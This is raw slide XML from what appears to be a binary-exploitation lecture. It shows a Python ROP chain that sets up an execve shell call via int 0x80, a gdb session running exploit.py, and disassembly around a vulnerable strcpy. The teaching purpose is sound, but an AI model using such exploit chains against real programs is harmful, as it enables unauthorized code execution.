              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>184</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673478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8155"/>
            <a:ext cx="8229600" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now we have all the data we need in memory, time to call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(@.data, @.data+12, @.data+8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is first argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char* path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080481c9) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx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0x080ea060) # @ .data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is second argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080e4bd1) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx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0x080ea06c) # @ .data + 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is the third argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0806e91a) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx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0x080ea068) # @ .data +8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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must be 11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># NOTE: we could remove the next line if we are 100% sure that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is zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80541b0) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80493e1) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print p,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>185</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563455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3">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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3">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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3">
                                            <p:txEl>
                                              <p:pRg st="23" end="23"/>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3">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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3">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>
                                            </p:txEl>
                                          </p:spTgt>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3">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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3">
                                            <p:txEl>
                                              <p:pRg st="28" end="2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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) b *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>exploit.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`"</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186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1733676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187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9832" y="646027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4961457" y="3844056"/>
          <a:ext cx="3696160" cy="276150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9450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9450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9450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9450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9450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0xbffff5ec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39450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9450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0x08048e67</a:t>
                      </a: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766339" y="7806"/>
            <a:ext cx="6256324" cy="3953696"/>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$0x3c,</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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,0x4(</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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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esp</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a: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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0xa,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
